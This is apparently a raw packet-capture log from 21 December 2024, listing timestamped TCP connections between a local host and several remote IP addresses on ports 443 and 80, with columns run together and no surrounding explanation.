                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.639560938 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.639575958 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.639693022 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.639839888 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.639854908 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.639884949 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.639918089 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640078068 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640078068 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640091896 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640281916 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640290976 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640333891 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640340090 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640717983 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640764952 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640778065 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.640984058 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641077995 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641086102 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641094923 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641257048 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641263962 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641448975 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641499043 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641524076 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641535997 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641776085 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641822100 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641853094 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641854048 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.641861916 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642087936 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642103910 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642126083 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642258883 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642271042 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642448902 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642458916 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642555952 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642632961 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642824888 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.642824888 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643017054 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643018007 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643018961 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643018961 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643018961 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643018961 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643018961 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643035889 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643207073 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643213987 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643395901 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643407106 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643637896 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643637896 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643786907 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643799067 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643821955 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.643835068 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644200087 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644200087 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644273043 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644287109 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644329071 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644488096 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644536972 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644546032 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644556046 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644717932 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644726992 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644860029 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644911051 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644911051 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.644922972 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645164967 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645268917 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645329952 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645345926 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645493984 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645522118 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645536900 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645677090 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645921946 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.645921946 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646312952 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646323919 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646327019 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646334887 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646574020 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646574020 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646773100 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646954060 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646954060 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.646970034 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647258043 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647258997 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647452116 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647452116 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647464991 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647469044 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647622108 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647670984 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647864103 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.647864103 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.648106098 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.648106098 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.648121119 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.648591042 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.648591042 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.648778915 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.648969889 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.649211884 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.649218082 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.649501085 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.649501085 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.649703026 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.649934053 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650125980 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650319099 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650330067 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650415897 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650628090 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650628090 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650628090 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650800943 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650800943 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650800943 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.650876045 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.651139021 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.651355982 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.651355982 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.651556015 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.651832104 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.652007103 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.652007103 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.652021885 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.652439117 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.652440071 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.652638912 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.652822018 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.652869940 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.653117895 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.653208971 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.653400898 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.653644085 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.653656960 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.653995991 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.654186964 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.654398918 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.654407978 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.654680014 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.654895067 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.654895067 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.654906988 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.655293941 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.655507088 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.655519962 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.655678988 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.655941963 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.655950069 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.656084061 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.656258106 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.656467915 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.656467915 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.656480074 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.656932116 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.656932116 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.657131910 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.657315016 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.657555103 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.657612085 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.657701969 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.657893896 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.658144951 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.658190012 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.658354044 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.658695936 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.658709049 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.658818960 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.659198999 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.659248114 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.659363031 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.659554958 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.659790039 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.659820080 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.659984112 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.660178900 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.660403013 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.660450935 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.660672903 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.660746098 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.660947084 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.661217928 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.661415100 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.661415100 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.661637068 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.661700010 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.661891937 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.662085056 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.662374020 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.662374020 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.662758112 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.662765026 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.662806034 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.663149118 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.663239956 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.663433075 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.663672924 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.663753986 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.664011955 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.664222002 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.664418936 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.664429903 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.664450884 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.664597988 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.664833069 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.665142059 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.665142059 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.665317059 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.665508032 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.665508032 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.665518999 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.665605068 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.665816069 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.666007996 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.666065931 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.666281939 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.666327953 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.666501999 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.666830063 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.667021990 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.667213917 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.667311907 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.667707920 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.667754889 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.668222904 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.768914938 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.768928051 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.769114971 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.769124985 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.769164085 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.769426107 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.774159908 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.774171114 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.774244070 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.774363041 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.774543047 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.774715900 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:49.775890112 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:21.608506918 CET49750443192.168.11.20204.79.197.237
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.074644089 CET4975180192.168.11.20199.232.214.172
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.074646950 CET4975280192.168.11.20172.217.165.195
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.074733973 CET4975380192.168.11.20199.232.214.172
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.204191923 CET8049752172.217.165.195192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.204387903 CET4975280192.168.11.20172.217.165.195
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.215745926 CET8049751199.232.214.172192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.215758085 CET8049751199.232.214.172192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.215981960 CET4975180192.168.11.20199.232.214.172
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.216305017 CET8049753199.232.214.172192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.216876030 CET8049753199.232.214.172192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:05:23.217039108 CET4975380192.168.11.20199.232.214.172
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.988734961 CET49756443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.988755941 CET44349756104.21.96.1192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.988930941 CET49756443192.168.11.20104.21.96.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:06:20.989538908 CET49756443192.168.11.20104.21.96.1
